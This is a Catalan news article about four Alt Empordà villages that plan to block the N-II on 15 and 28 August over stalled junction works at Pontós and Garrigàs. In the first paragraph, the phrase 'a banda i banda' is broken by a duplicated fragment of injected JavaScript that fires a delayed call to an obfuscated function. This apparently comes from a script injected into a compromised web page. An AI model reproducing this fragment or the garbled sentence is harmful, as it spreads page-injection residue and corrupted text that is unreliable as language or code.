Quatre pobles de l’Alt Empordà tallaran l’N-II per reclamar a l’Estat que desencalli l’obra de dos punts negres

Comparteix-ho amb els teus amics:

Els treballs a les interseccions de Garrigàs i Pontós porten més de mig anys aturats i la zona ha quedat empantanegada

Les obres per millorar les cruïlles de l’N-II a Pontós i Garrigàs van començar abans de les eleccions del desembre. Els treballs es van adjudicar per 6,89 milions d’euros (MEUR). Per resoldre aquests punts negres, i evitar que els cotxes hagin de creuar el carril contrari a l’hora de fer els girs cap a l’esquerra, es preveien construir rotondes a bandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anda i bandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anda i connectar-les amb un pas elevat.

Arxiu ACN L'N-II a l'alçada de Garrigàs. Al fons, hi ha la intersecció que s'ha de millorar i on ara les obres estan aturades des de fa mig any.

L’adjudicatària va començar l’obra per la cruïlla de Pontós. Poc després, però, els treballs es van aturar i la zona ja porta més de mig any empantanegada. El cartell que anuncia les obres, això sí, hi és. Més enllà de quatre tubs de formigó i terra remoguda, però, a la zona fa mesos que les màquines no hi treballen.

Els alcaldes dels quatre pobles n’estan tips de les promeses incomplertes de Foment i reclamen solucions immediates. El de Garrigàs, Josep Masoliver, explica que la zona és un “punt negre”, perquè aquí s’hi han registrat molts accidents (alguns dels quals, mortals). Sense anar més lluny, l’alcalde explica que ara fa tres setmanes dos cotxes van topar a la intersecció del municipi.

Fa més de vint anys que aquests quatre pobles esperen la millora de les interseccions amb l’N-II. El projecte, precisament, es va deslligar del desdoblament de la nacional a l’Alt Empordà amb l’objectiu de tirar-lo endavant.

Ara, però, Josep Masoliver explica que de nou es troben amb què Foment els ha deixat “de la mà de Déu”. Segons explica, a darrera hora hi ha hagut una modificació del projecte, que precisament afecta la intersecció de Garrigàs. Aquí, l’Estat ha decidit no fer un pas superior per l’N-II, sinó inferior, i aprofitar la terra que s’extregui per emplenar el talús que s’haurà d’aixecar a la intersecció de Pontós.

I això ha comportat eternitzar encara més la solució per a aquests dos punts de la nacional a l’Alt Empordà. “Foment s’escuda dient-nos que hi ha aquest modificat del projecte i que ara el govern està en funcions; però ja portem des de l’any 1991 anant-hi al darrere perquè es facin les millores”, concreta Masoliver.

Talls els dies 15 i 28

Els alcaldes i els veïns, farts dels incompliments del Ministeri, han decidit plantar-se. Per això, Borrassà, Pontós, Garrigàs i Palau de Santa Eulàlia tallaran l’N-II els propers dies 15 i 28 d’agost a les set de la tarda. “Volem fer-ho com a mesura de pressió, perquè les obres es reprenguin d’una vegada per totes”, assegura Josep Masoliver.

L’alcalde ja avança que, si Foment no els escolta, intensificaran la protesta. Aleshores, es plantegen anar una mica més enllà i col·lapsar la rotonda que dóna entrada a Figueres des de l’N-II, però que també distribueix el trànsit cap a l’autopista AP-7 i cap a la Costa Brava nord.

Foto: Arxiu ACN
L’N-II a l’alçada de Garrigàs. Al fons, hi ha la intersecció que s’ha de millorar i on ara les obres estan aturades des de fa mig any.